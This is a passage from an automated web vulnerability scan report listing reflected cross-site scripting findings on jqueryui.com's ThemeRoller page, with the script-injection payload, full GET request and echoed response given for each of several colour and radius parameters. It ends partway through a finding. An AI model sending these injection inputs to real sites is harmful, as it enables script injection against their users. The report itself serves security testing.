GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD42f4a"><script>alert(1)</script>475d9e92991&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD42f4a"><script>alert(1)</script>475d9e92991&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AA
...[SNIP]...

2.56. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8752b"><script>alert(1)</script>e220339ee07 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9368752b"><script>alert(1)</script>e220339ee07&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
mgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9368752b"><script>alert(1)</script>e220339ee07&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgT
...[SNIP]...

2.57. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37cb2"><script>alert(1)</script>0fa604b9a9c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF37cb2"><script>alert(1)</script>0fa604b9a9c&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF37cb2"><script>alert(1)</script>0fa604b9a9c&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC
...[SNIP]...

2.58. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e14f"><script>alert(1)</script>04d20544562 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px4e14f"><script>alert(1)</script>04d20544562&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px4e14f"><script>alert(1)</script>04d20544562&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

2.59. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d33e"><script>alert(1)</script>d4448f15dc2 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*7d33e"><script>alert(1)</script>d4448f15dc2 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
y=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*7d33e"><script>alert(1)</script>d4448f15dc2" type="text/css" media="all" />
...[SNIP]...

2.60. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c39"><script>alert(1)</script>60cd583f00d was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC38c39"><script>alert(1)</script>60cd583f00d&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC38c39"><script>alert(1)</script>60cd583f00d&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=F
...[SNIP]...

2.61. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5dc0"><script>alert(1)</script>24ffebe8c1a was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666a5dc0"><script>alert(1)</script>24ffebe8c1a&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666a5dc0"><script>alert(1)</script>24ffebe8c1a&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTex
...[SNIP]...

2.62. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dedb6"><script>alert(1)</script>f1dea2bcac was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFFdedb6"><script>alert(1)</script>f1dea2bcac&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFFdedb6"><script>alert(1)</script>f1dea2bcac&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=
...[SNIP]...

2.63. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88db2"><script>alert(1)</script>4192bd9f2a0 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B1000088db2"><script>alert(1)</script>4192bd9f2a0&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B1000088db2"><script>alert(1)</script>4192bd9f2a0&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1
...[SNIP]...

2.64. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 316fc"><script>alert(1)</script>934e76f5e was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

